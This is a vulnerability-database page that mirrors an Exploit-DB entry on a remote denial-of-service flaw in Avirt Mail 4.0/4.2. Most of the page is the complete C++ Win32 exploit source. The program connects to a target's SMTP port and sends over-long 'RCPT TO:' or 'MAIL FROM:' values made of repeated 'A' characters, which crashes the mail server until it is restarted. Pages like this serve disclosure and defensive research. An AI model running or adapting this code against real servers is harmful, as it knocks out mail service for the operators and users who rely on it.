Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Avirt Mail 4.0/4.2 - 'Mail From:' / 'Rcpt to:' Denial of Service

🗓️ 23 Oct 2000 00:00:00Reported by MartinType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 23 Views

Avirt Mail 4.0/4.2 has DoS vulnerability due to inadequate input size checks in fields 'MAIL FROM' and 'RCPT TO'.

Code
// source: https://www.securityfocus.com/bid/1825/info

Due to insufficient bounds checking in the code that handles the fields 'MAIL FROM:' and 'RCPT TO:', it is possible to remotely crash Avirt Mail.

Entering over 272 characters into the 'RCPT TO:' field will crash the application upon termination of the session and no further connections can be initiated until Avirt Mail is restarted. This is also the case with the 'MAIL FROM' field with the exception that over 556 characters must be entered.

/*
   Small piece of code demonstrating DoS vulnerability in Avirt Mail 4.0-4.2
   [email protected]
   Win32 console code
*/
#include <mem.h>
#include <winsock.h>
#include <iostream.h>
#include <stdlib.h>

#define RCPT_SIZE 272
#define FROM_SIZE 556

struct sckssString
{
   char *szBuffer;
   int nSize;
};

char szHELO[] = "HELO anonymous";
char szMAIL[] = "MAIL FROM: ";
char szRCPT[] = "RCPT TO: ";
char szQUIT[] = "QUIT";
char szDATA[] = "DATA\nTest data\n.";

void socksenddata(int socket, sckssString* data)
{
   if(send(socket,data->szBuffer,data->nSize,NULL)!=SOCKET_ERROR)
   {
      cout << "->" << data->szBuffer << endl;
      return;
   }
   else
   {
      cout << endl << "WSA error (" << WSAGetLastError() << ")" << endl;
      exit(1);
   }
}

void socksendendline(int socket)
{
   if(send(socket,"\n",1,NULL)!=SOCKET_ERROR) return;
   else
   {
      cout << endl <<  "WSA error (" << WSAGetLastError() << ")" << endl;
      exit(1);
   }
}

void socksendanum(int socket, unsigned long int num)
{
   char *tempa = new char[num+1];
   memset(tempa,'A',num);
   tempa[num]=0;
   if(send(socket,tempa,num,NULL)!=SOCKET_ERROR)
   {
      cout << "->" << tempa << endl;
      return;
   }
   else
   {
      cout << endl <<  "WSA error (" << WSAGetLastError() << ")" << endl;
      exit(1);
   }
   delete[] tempa;
}

int main(int argv, char **argc)
{
   if(argv<3)
   {
      cout << "Usage: " << argc[0] << " ip-address type" << endl;
      cout << "Types:" << endl;
      cout << "1 - Overflow in RCPT TO: command.   (aborted session)" << endl;
      cout << "2 - Overflow in MAIL FROM: command. (aborted session)" << endl;
      cout << "3 - Overflow in RCPT TO: command.   (finnished session)" << endl;
      cout << "2 - Overflow in MAIL FROM: command. (finnished session)" << endl;
      exit(1);
   }
   WORD wVersionRequested = MAKEWORD(1,1);
   WSADATA wsaData;
   WSAStartup(wVersionRequested, &wsaData);

   SOCKADDR_IN saExploit;
   saExploit.sin_family = PF_INET;
   saExploit.sin_addr.s_addr = inet_addr(argc[1]);
   saExploit.sin_port = htons(25);

   SOCKET sckExploit = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
   if (sckExploit == INVALID_SOCKET)
   {
      cout << "WSA error (" << WSAGetLastError() << ")" << endl;
      WSACleanup();
      return 1;
   }

   if (connect(sckExploit,(LPSOCKADDR)&saExploit,sizeof(saExploit))==SOCKET_ERROR)
   {
      cout << "WSA error (" << WSAGetLastError() << ")" << endl;
      shutdown(sckExploit,2);
      closesocket(sckExploit);
      WSACleanup();
      return 1;
   }

   sckssString sckssHelo;
   sckssHelo.nSize = strlen(szHELO);
   sckssHelo.szBuffer = new char[sckssHelo.nSize+1];
   strcpy(sckssHelo.szBuffer, szHELO);

   sckssString sckssMail;
   sckssMail.nSize = strlen(szMAIL);
   sckssMail.szBuffer = new char[sckssMail.nSize+1];
   strcpy(sckssMail.szBuffer, szMAIL);

   sckssString sckssRcpt;
   sckssRcpt.nSize = strlen(szRCPT);
   sckssRcpt.szBuffer = new char[sckssRcpt.nSize+1];
   strcpy(sckssRcpt.szBuffer, szRCPT);

   sckssString sckssQuit;
   sckssQuit.nSize = strlen(szQUIT);
   sckssQuit.szBuffer = new char[sckssQuit.nSize+1];
   strcpy(sckssQuit.szBuffer, szQUIT);

   sckssString sckssData;
   sckssData.nSize = strlen(szDATA);
   sckssData.szBuffer = new char[sckssData.nSize+1];
   strcpy(sckssData.szBuffer, szDATA);

   cout << "Beginning session..." << endl;

   switch(atoi(argc[2]))
   {
      case 1:
      {
         socksenddata(sckExploit,&sckssHelo);
         socksendendline(sckExploit);

         socksenddata(sckExploit,&sckssMail);
         socksendanum(sckExploit,5);
         socksendendline(sckExploit);

         socksenddata(sckExploit,&sckssRcpt);
         cout << "Overflowing RCPT TO:" << endl;
         socksendanum(sckExploit,RCPT_SIZE);
         socksendendline(sckExploit);

         cout << "Aborting session before data." << endl;
         socksenddata(sckExploit,&sckssQuit);
         socksendendline(sckExploit);
         break;
      }
      case 2:
      {
         socksenddata(sckExploit,&sckssHelo);
         socksendendline(sckExploit);

         socksenddata(sckExploit,&sckssMail);
         cout << "Overflowing MAIL FROM:" << endl;
         socksendanum(sckExploit,FROM_SIZE);
         socksendendline(sckExploit);

         socksenddata(sckExploit,&sckssRcpt);
         socksendanum(sckExploit,5);
         socksendendline(sckExploit);

         cout << "Aborting session before data." << endl;
         socksenddata(sckExploit,&sckssQuit);
         socksendendline(sckExploit);
         break;
      }
      case 3:
      {
         socksenddata(sckExploit,&sckssHelo);
         socksendendline(sckExploit);

         socksenddata(sckExploit,&sckssMail);
         socksendanum(sckExploit,5);
         socksendendline(sckExploit);

         socksenddata(sckExploit,&sckssRcpt);
         cout << "Overflowing RCPT TO:" << endl;
         socksendanum(sckExploit,RCPT_SIZE);
         socksendendline(sckExploit);

         socksenddata(sckExploit,&sckssData);
         socksendendline(sckExploit);

         cout << "Ending session." << endl;
         socksenddata(sckExploit,&sckssQuit);
         socksendendline(sckExploit);
         break;
      }
      case 4:
      {
         socksenddata(sckExploit,&sckssHelo);
         socksendendline(sckExploit);

         socksenddata(sckExploit,&sckssMail);
         cout << "Overflowing MAIL FROM:" << endl;
         socksendanum(sckExploit,FROM_SIZE);
         socksendendline(sckExploit);

         socksenddata(sckExploit,&sckssRcpt);
         socksendanum(sckExploit,5);
         socksendendline(sckExploit);

         socksenddata(sckExploit,&sckssData);
         socksendendline(sckExploit);

         cout << "Ending session." << endl;
         socksenddata(sckExploit,&sckssQuit);
         socksendendline(sckExploit);
         break;
      }
      default:
      {
         cout << "Type " << argc[2] << " not allowed." << endl;
         break;
      }
   }

   shutdown(sckExploit,2);
   closesocket(sckExploit);
   WSACleanup();
   cout << endl << "Ready!" << endl;
   return 0;
}


--=====================_972334194==_--

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
23 Oct 2000 00:00Current
7.4High risk
Vulners AI Score7.4
denial of serviceinsufficient bounds checkingremote crashavirt mail vulnerabilityinput size limits
23